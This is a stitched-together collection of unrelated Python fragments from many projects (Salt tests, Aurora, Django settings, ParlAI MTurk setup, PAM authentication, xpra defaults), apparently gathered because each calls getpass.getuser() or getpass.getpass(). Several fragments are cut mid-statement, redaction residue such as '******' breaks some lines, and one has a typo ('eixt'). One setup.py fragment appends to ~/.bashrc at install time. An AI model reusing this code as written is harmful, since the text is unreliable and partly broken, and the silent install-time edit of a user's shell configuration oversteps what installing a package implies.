def _run_initscript(self, init_script, minions, minion_running, action, exitstatus=None, message=''): ''' Wrapper that runs the initscript for the configured minions and verifies the results. ''' user = getpass.getuser() ret = init_script.run( [action], catch_stderr=True, with_retcode=True, env={ 'SALTMINION_CONFIGS': '\n'.join([ '{0} {1}'.format(user, minion.abs_path(minion.config_dir)) for minion in minions ]), }, timeout=90, ) for line in ret[0]: log.debug('script: salt-minion: stdout: {0}'.format(line)) for line in ret[1]: log.debug('script: salt-minion: stderr: {0}'.format(line)) log.debug('exit status: {0}'.format(ret[2])) if six.PY3: std_out = b'\nSTDOUT:'.join(ret[0]) std_err = b'\nSTDERR:'.join(ret[1]) else: std_out = '\nSTDOUT:'.join(ret[0]) std_err = '\nSTDERR:'.join(ret[1]) # Check minion state for minion in minions: self.assertEqual( minion.is_running(), minion_running, 'script action "{0}" should result in minion "{1}" {2} and is not.\nSTDOUT:{3}\nSTDERR:{4}' .format( action, minion.name, ["stopped", "running"][minion_running], std_out, std_err, )) if exitstatus is not None: self.assertEqual( ret[2], exitstatus, 'script action "{0}" {1} exited {2}, must be {3}\nSTDOUT:{4}\nSTDERR:{5}' .format( action, message, ret[2], exitstatus, std_out, std_err, )) return ret
def find_obs_date(obsid): """ find the observation date for a given obsid. """ # #---checking the current user # user = getpass.getuser() user = user.strip() if user == 'mta': cmd = 'lynx -source http://acis.mit.edu/cgi-bin/get-obsid?id=' + str( obsid) + ' > ' + mtemp_dir + 'ztemp' elif user == 'cus': cmd = 'lynx -source http://acis.mit.edu/cgi-bin/get-obsid?id=' + str( obsid) + ' > ' + ctemp_dir + 'ztemp' else: print "the user is not mta or cus. Exiting" eixt(1) os.system(cmd) line = mtemp_dir + 'ztemp' f = open(line, 'r') data = [line.strip() for line in f.readlines()] f.close() cmd = 'rm ' + mtemp_dir + 'ztemp' os.system(cmd) chk = 0 for ent in data: if chk == 1: atemp = re.split('\<tt\>', ent) btemp = re.split('\<', atemp[1]) date = btemp[0] chk += 1 break else: m = re.search('Start Date:', ent) if m is not None: chk = 1 atemp = re.split('\s+|\t+', date) btemp = re.split('-', atemp[0]) mon = tcnv.changeMonthFormat(int( btemp[1])) #--- convert digit month to letter month # #--- change time format from 24 hr to 12 hr system # ctemp = re.split(':', atemp[1]) part = 'AM' time = int(ctemp[0]) if time >= 12: time -= 12 part = 'PM' stime = str(time) if time < 10: stime = '0' + stime stime = stime + ':' + ctemp[1] + part date = mon + ' ' + btemp[2] + ' ' + btemp[0] + ' ' + stime return date
name=AURORA_EXECUTOR_NAME, data=thermos_config.json_dumps()), job=JobKey(role=role, environment='env', name='name'), owner=Identity(role=role, user=role)), assignedPorts=assigned_ports, **kw) td = mesos_pb2.TaskInfo() td.task_id.value = task_id td.name = thermos_config.task().name().get() td.data = serialize(at) return td BASE_MTI = MesosTaskInstance(instance=0, role=getpass.getuser()) BASE_TASK = Task(resources=Resources(cpu=1.0, ram=16 * MB, disk=32 * MB)) HELLO_WORLD_TASK_ID = 'hello_world-001' HELLO_WORLD = BASE_TASK(name='hello_world', processes=[ Process(name='hello_world_{{thermos.task_id}}', cmdline='echo hello world') ]) HELLO_WORLD_MTI = BASE_MTI(task=HELLO_WORLD) SLEEP60 = BASE_TASK(processes=[Process(name='sleep60', cmdline='sleep 60')]) SLEEP2 = BASE_TASK(processes=[Process(name='sleep2', cmdline='sleep 2')]) SLEEP60_MTI = BASE_MTI(task=SLEEP60) MESOS_JOB = MesosJob(
# Third-party packages import pyglet from pyglet.resource import get_settings_path # Modules from this project # Nothing for now... APP_NAME = 'pyCraft' # should I stay or should I go? APP_VERSION = 0.1 DEBUG = False LOG_DEBUG, LOG_INFO, LOG_WARNING, LOG_ERROR, LOG_FATAL = range(5) LOG_LEVEL = LOG_INFO IP_ADDRESS = "neb.nebtown.info" # The IP Address to connect to USERNAME = getpass.getuser() # Default to system username CLIENT = None # Becomes the instance of PacketReceiver if running the client SERVER = None # Becomes the instance of Server if running the server # Game modes SURVIVAL_MODE = 'survival' CREATIVE_MODE = 'creative' GAME_MODE_CHOICES = (SURVIVAL_MODE, CREATIVE_MODE) GAME_MODE = CREATIVE_MODE SINGLEPLAYER = False # User input # Movement MOVE_FORWARD_KEY = 'W'
ip = os.popen("ifconfig $(netstat -rn | awk '/^default[[:space:]]/ {print $6}') | sed -n '4 s/.*inet //; 4 s/ .*// p'").read().rstrip('\n') # pylint: disable=line-too-long else: warn('OS is not Linux or Mac, IP detection will not work') if not isIP(ip): warn('defaulting IP to %s' % default_ip) ip = default_ip ipython_profile_name = "pyspark" ########################### template = Template(open(template_file).read()) password = "******" password2 = "2" if getpass.getuser() == 'root': print("please run this as your regular user account and not root!") sys.exit(1) def get_password(): global password global password2 #password = raw_input("Enter password to protect your personal IPython NoteBook\n\npassword: "******"confirm password: "******"\nEnter a password to protect your personal IPython NoteBook (sha1 hashed and written to a config file)\n" ) password = getpass.getpass() password2 = getpass.getpass("Confirm Password: ")
def load(self, profile='default', rootpath=None, reload=True, parameters=None): """ Performs the following steps: - set rootpath for the given project - import variables from <rootpath>/.env (if present), - load the `profile` from the metadata files - setup and start the data engine :param profile: load the given metadata profile (default: 'default') :param rootpath: root directory for loaded project default behaviour: search parent dirs to detect rootdir by looking for a '__main__.py' or 'main.ipynb' file. When such a file is found, the corresponding directory is the root path for the project. If nothing is found, the current working directory, will be the rootpath :param reload: if set to false, it prevents to reload a new profile :param parameters: optional dict, available as metadata variables :return: None Notes about metadata configuration: 1) Metadata files are merged up, so you can split the information in multiple files as long as they end with `metadata.yml`. For example: `metadata.yml`, `abc.metadata.yaml`, `abc_metadata.yml` are all valid metadata file names. 2) All metadata files in all subdirectories from the project root directory are loaded, unless the directory contains a file `metadata.ignore.yml` 3) Metadata files can provide multiple profile configurations, by separating each profile configuration with a Document Marker ( a line with `---`) (see https://yaml.org/spec/1.2/spec.html#YAML) 4) Each metadata profile, can be broken down in multiple yaml files, When loading the files all configuration belonging to the same profile with be merged. 5) All metadata profiles inherit the settings from profile 'default' Metadata files are composed of 6 sections: - profile - variables - providers - resources - engine - logging For more information about metadata configuration, type `help(datafaucet.project.metadata)` """ if self.loaded and not self._reload: logging.notice( f"Profile '{self._profile}' already loaded with option 'reload=False':" "Skipping project.load()") return self # set rootpath paths.set_rootdir(rootpath) # set loaded to false self.loaded = False # get currently running script path self._script_path = files.get_script_path(paths.rootdir()) # set dotenv default file, check the file exists self._dotenv_path = files.get_dotenv_path(paths.rootdir()) # get files self._metadata_files = files.get_metadata_files(paths.rootdir()) self._notebook_files = files.get_jupyter_notebook_files( paths.rootdir()) self._python_files = files.get_python_files(paths.rootdir()) # metadata defaults dir_path = os.path.dirname(os.path.realpath(__file__)) default_md_files = [os.path.join(dir_path, 'schemas/default.yml')] project_md_files = abspath(self._metadata_files, paths.rootdir()) # load metadata try: md_paths = default_md_files + project_md_files dotenv_path = abspath(self._dotenv_path, paths.rootdir()) metadata.load(profile, md_paths, dotenv_path, parameters=parameters) except ValueError as e: print(e) # bail if no metadata if metadata.profile is None: raise ValueError('No valid metadata to load.') # set username self._username = getpass.getuser() # get repo data self._repo = git.repo_data() # set profile from metadata self._profile = metadata.info()['active'] # set session name name_parts = [self._profile, self._repo.get('name')] self._session_name = '-'.join([x for x in name_parts if x]) # set session id self._session_id = hex(uuid.uuid1().int >> 64) # initialize logging log_config = metadata.profile('logging') logging.init(log_config['level'], log_config['stdout'], log_config['file'], log_config['kafka'], self._session_id) # add rootpath to the list of python sys paths if paths.rootdir() not in sys.path: sys.path.append(paths.rootdir()) # stop existing engine if self._engine: self._engine.stop() # services services = dict() all_aliases = list(metadata.profile()['providers'].keys()) # get services from aliases for alias in all_aliases: r = Resource(alias) services[r['service']] = r # get one service from each type to # load drivers, jars etc via the engine init services = list(services.values()) # initialize the engine md = metadata.profile()['engine'] engines.Engine(md['type'], session_name=self._session_name, session_id=self._session_id, master=md['master'], timezone=md['timezone'], jars=md['jars'], packages=md['packages'], files=md['files'], repositories=md['repositories'], services=services, conf=md['conf'], detect=md['detect']) # set loaded to True self.loaded = True self._reload = reload # return object return self
def initialHierarchy(self): self.plog.log("Build initial hierarchy") # -------------------------------------------------- # Model self.model = xsi.ActiveSceneRoot.AddModel(None, self.options["rigName"]) self.model.Properties("visibility").Parameters("viewvis").Value = False # -------------------------------------------------- # Global Ctl if "global_C0_ctl" in self.guide.controlers.keys(): self.global_ctl = self.guide.controlers["global_C0_ctl"].create(self.model, "global_C0_ctl", XSIMath.CreateTransform(), self.options["C_color_fk"]) else: self.global_ctl = icon.crossarrow(self.model, "global_C0_ctl", 10, self.options["C_color_fk"]) par.setKeyableParameters(self.global_ctl, ["posx", "posy", "posz", "rotx", "roty", "rotz", "rotorder"]) self.addToGroup(self.global_ctl, "controlers_01") # -------------------------------------------------- # INFOS self.info_prop = self.model.AddProperty("gear_PSet", False, "info") pRigName = self.info_prop.AddParameter3("rig_name", c.siString, self.options["rigName"], None, None, False, True) pUser = self.info_prop.AddParameter3("user", c.siString, getpass.getuser(), None, None, False, True) pIsWip = self.info_prop.AddParameter3("isWip", c.siBool, self.options["mode"] != 0, None, None, False, True) pDate = self.info_prop.AddParameter3("date", c.siString, datetime.datetime.now(), None, None, False, True) pXSIVersion = self.info_prop.AddParameter3("xsi_version", c.siString, xsi.Version(), None, None, False, True) pGEARVersion = self.info_prop.AddParameter3("gear_version", c.siString, gear.getVersion(), None, None, False, True) pSynoptic = self.info_prop.AddParameter3("synoptic", c.siString, self.options["synoptic"], None, None, False, False) pComments = self.info_prop.AddParameter3("comments", c.siString, self.options["comments"], None, None, False, True) pComponentsGrid = self.info_prop.AddGridParameter("componentsGrid") self.components_grid = pComponentsGrid.Value self.components_grid.ColumnCount = 4 self.components_grid.SetColumnLabel(0, "Name") self.components_grid.SetColumnLabel(1, "Type") self.components_grid.SetColumnLabel(2, "Version") self.components_grid.SetColumnLabel(3, "Author") self.info_layout = ppg.PPGLayout() self.info_mainTab = self.info_layout.addTab("Main") group = self.info_mainTab.addGroup("Main") group.addItem(pRigName.ScriptName, "Name") group.addItem(pUser.ScriptName, "User") group.addItem(pIsWip.ScriptName, "Is Wip") group.addItem(pDate.ScriptName, "Date") group.addItem(pXSIVersion.ScriptName, "XSI Version") group.addItem(pGEARVersion.ScriptName, "GEAR Version") group = self.info_mainTab.addGroup("Synoptic") item = group.addItem(pSynoptic.ScriptName, "Synoptic") item.setAttribute(c.siUINoLabel, True) group = self.info_mainTab.addGroup("Comments") item = group.addString(pComments.ScriptName, "", True, 120) item.setAttribute(c.siUINoLabel, True) self.info_componentTab = self.info_layout.addTab("Components") group = self.info_componentTab.addGroup("GEAR") group.addItem(pGEARVersion.ScriptName, "Version") group = self.info_componentTab.addGroup("Components") item = group.addItem(pComponentsGrid.ScriptName, "", c.siControlGrid) item.setAttribute(c.siUINoLabel, True) self.info_prop.Parameters("layout").Value = self.info_layout.getValue() # -------------------------------------------------- # UI SETUP AND ANIM self.ui = UIHost(self.global_ctl) # Setup_Ctrl self.setup_mainTab = self.ui.setup_layout.addTab("Main") # Anim_Ctrl self.anim_mainTab = self.ui.anim_layout.addTab("Main") self.pRigScale = self.ui.anim_prop.AddParameter2("rigScale", c.siDouble, 1, 0.001, None, .001, 3, c.siClassifUnknown, c.siAnimatable|c.siKeyable) self.pOGLLevel = self.ui.anim_prop.AddParameter3("oglLevel", c.siInt4, 0, 0, 2, False, False) self.pResolutions = self.ui.anim_prop.AddParameter3("resolutions", c.siInt4, 0, 0, None, False, False) group = self.anim_mainTab.addGroup("Animate") group.addItem(self.pRigScale.ScriptName, "Global Scale") group = self.anim_mainTab.addGroup("Performance") #group.addEnumControl(self.pResolutions.ScriptName, ["default", 0], "Resolutions", c.siControlCombo) group.addItem(self.pOGLLevel.ScriptName, "OGL Level") # scale expression for s in "xyz": par.addExpression(self.global_ctl.Kinematics.Local.Parameters("scl"+s), self.pRigScale) # -------------------------------------------------- # Basic set of null if self.options["shadowRig"]: self.shd_org = self.model.AddNull("shd_org") self.addToGroup(self.shd_org, "hidden")
], }, }, ] WSGI_APPLICATION = 'example_project.wsgi.application' DATABASES = { # Configure by setting the DATABASE_URL environment variable. # The default settings may work well for local development. 'default': dj_database_url.config() or { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'hordak', 'HOST': '127.0.0.1', 'PORT': '5432', 'USER': getpass.getuser(), 'PASSWORD': '', } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
try: #Request needed info from command line. host = input_stuff("Source database host address (default is localhost):", "localhost") logger.log("Source host name %s" % host, 0) # dbname = input_stuff( # "Database name (Name of database on host):" # ,"pyjunk") #logger.log("Database name %s" % dbname, 0) user = input_stuff( "Database role (username - leave blank if same as your current user):", getpass.getuser()) logger.log("Username %s" % user, 0) #Obviously, don't log the role password in the log password = getpass.getpass("Role password:"******"_qstemplate" databases = get_DB_list(dbname, user, password, host) for database in databases: if database[0] not in ('postgres', 'template0', 'template1'): conn = create_connection(database[0], user, password, host) get_activities(database[0], conn) get_campaigns(database[0], conn) close_connection(conn)
###################################################################### # SETUP # ###################################################################### from setuptools import setup, find_packages from getpass import getuser import os from sys import platform user = getuser() def run(): if platform == 'linux': os.system(f'echo "export PATH="/home/{user}/.local/bin:$PATH"" >> ~/.bashrc') run() setup( name = 'electric', version = '1.0.0', description= 'The Official Package Manager For Windows, MacOS and Linux!', url="https://github.com/TheBossProSniper/Electric", author = 'TheBossProSniper', author_email = '*****@*****.**', py_modules=['electric'], packages=find_packages(), scripts=[os.path.join(os.path.abspath(os.getcwd()), 'src', 'electric.py')], install_requires = [
from subprocess import call import zipfile import boto3 import botocore import time import json import webbrowser import hashlib import getpass from botocore.exceptions import ClientError from botocore.exceptions import ProfileNotFound from parlai.mturk.core.data_model import setup_database_engine, init_database, check_database_health aws_profile_name = 'parlai_mturk' region_name = 'us-east-1' user_name = getpass.getuser() iam_role_name = 'parlai_relay_server' lambda_function_name = 'parlai_relay_server_' + user_name lambda_permission_statement_id = 'lambda-permission-statement-id' api_gateway_name = 'ParlaiRelayServer_' + user_name endpoint_api_name_html = 'html' # For GET-ing HTML endpoint_api_name_json = 'json' # For GET-ing and POST-ing JSON rds_db_instance_identifier = 'parlai-mturk-db-' + user_name rds_db_name = 'parlai_mturk_db_' + user_name rds_username = '******' rds_password = '******' rds_security_group_name = 'parlai-mturk-db-security-group' rds_security_group_description = 'Security group for ParlAI MTurk DB' rds_db_instance_class = 'db.t2.medium'
p_response[0] = cast(addr, POINTER(PamResponse)) for i in range(n_messages): if messages[i].contents.msg_style == PAM_PROMPT_ECHO_OFF: pw_copy = STRDUP(str(password)) p_response.contents[i].resp = cast(pw_copy, c_char_p) p_response.contents[i].resp_retcode = 0 return 0 handle = PamHandle() conv = PamConv(my_conv, 0) retval = PAM_START(service, username, pointer(conv), pointer(handle)) if retval != 0: # TODO: This is not an authentication error, something # has gone wrong starting up PAM return False retval = PAM_AUTHENTICATE(handle, 0) if retval == 0 and enable_acct_mgrt: retval = PAM_ACCT_MGMT(handle, 0) PAM_END(handle, retval) return retval == 0 if __name__ == "__main__": import getpass print authenticate(getpass.getuser(), getpass.getpass())
# OmniDB User Folder DESKTOP_MODE = False if DEV_MODE: HOME_DIR = BASE_DIR elif DESKTOP_MODE: HOME_DIR = os.path.join(os.path.expanduser('~'), '.omnidb', 'omnidb-app') else: HOME_DIR = os.path.join(os.path.expanduser('~'), '.omnidb', 'omnidb-server') if not os.path.exists(HOME_DIR): os.makedirs(HOME_DIR) CHAT_FOLDER = os.path.join(HOME_DIR, 'chat') if not os.path.exists(CHAT_FOLDER): os.makedirs(CHAT_FOLDER) try: os.symlink(CHAT_FOLDER, os.path.join(BASE_DIR, 'OmniDB_app/static', 'chat-{0}'.format(getpass.getuser()))) except: pass CHAT_LINK = '/static/chat-{0}'.format(getpass.getuser()) LOG_DIR = HOME_DIR SESSION_DATABASE = os.path.join(HOME_DIR, 'db.sqlite3') if not os.path.exists(SESSION_DATABASE): shutil.copyfile(os.path.join(BASE_DIR, 'db.sqlite3'), SESSION_DATABASE) CONFFILE = os.path.join(HOME_DIR, 'omnidb.conf') if not DEV_MODE and not os.path.exists(CONFFILE): shutil.copyfile(os.path.join(BASE_DIR, 'omnidb.conf'), CONFFILE) OMNIDB_DATABASE = os.path.join(HOME_DIR, 'omnidb.db') # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
def get_defaults(): global GLOBAL_DEFAULTS if GLOBAL_DEFAULTS is not None: return GLOBAL_DEFAULTS from xpra.platform.features import DEFAULT_SSH_CMD try: import getpass username = getpass.getuser() except: username = "" GLOBAL_DEFAULTS = { "encoding" : "", "title" : "@title@ on @client-machine@", "host" : "", "username" : username, "remote-xpra" : ".xpra/run-xpra", "session-name" : "", "client-toolkit" : "", "dock-icon" : "", "tray-icon" : "", "window-icon" : "", "password" : "", "password-file" : "", "clipboard-filter-file" : "", "pulseaudio-command": "pulseaudio --start --daemonize=false --system=false " +" --exit-idle-time=-1 -n --load=module-suspend-on-idle " +" --load=module-null-sink --load=module-native-protocol-unix " +" --log-level=2 --log-target=stderr", "encryption" : "", "mode" : "tcp", "ssh" : DEFAULT_SSH_CMD, "xvfb" : "Xvfb +extension Composite -screen 0 3840x2560x24+32 -nolisten tcp -noreset -auth $XAUTHORITY", "socket-dir" : "", "log-file" : "$DISPLAY.log", "window-layout" : "", "quality" : -1, "min-quality" : 50, "speed" : -1, "min-speed" : -1, "port" : -1, "compression_level" : 3, "dpi" : 96, "max-bandwidth" : 0.0, "auto-refresh-delay": 0.25, "debug" : False, "daemon" : True, "use-display" : False, "no-tray" : False, "clipboard" : True, "pulseaudio" : True, "mmap" : True, "mmap-group" : False, "speaker" : True, "microphone" : True, "readonly" : False, "keyboard-sync" : True, "pings" : False, "cursors" : True, "bell" : True, "notifications" : True, "system-tray" : True, "sharing" : False, "delay-tray" : False, "windows" : True, "autoconnect" : False, "exit-with-children": False, "opengl" : OPENGL_DEFAULT, "speaker-codec" : [], "microphone-codec" : [], "key-shortcut" : ["Meta+Shift+F4:quit", "Meta+Shift+F8:magic_key"], "bind-tcp" : None, "start-child" : None, } return GLOBAL_DEFAULTS
import getpass import socket if (".cern.ch" in socket.gethostname() or "lxplus" in socket.gethostname()) and getpass.getuser() == "hroskes": repositorydir = "/afs/cern.ch/work/h/hroskes/anomalouscouplings" plotsbasedir = "/afs/cern.ch/user/h/hroskes/www/anomalouscouplings/" host = "lxplus" elif "login-node" in socket.gethostname() and getpass.getuser() == "*****@*****.**": repositorydir = "/work-zfs/lhc/heshy/ICHEPanomalouscouplings/" plotsbasedir = "/work-zfs/lhc/heshy/ICHEPanomalouscouplings/plots/" host = "MARCC" else: raise ValueError("Who/where are you?") unblinddistributions = True unblindscans = True expectedscanluminosity = 30 m4lmin, m4lmax = 105, 140 blindcut = lambda self: self.D_bkg_0plus() < 0.5 productionsforcombine = ("160225",)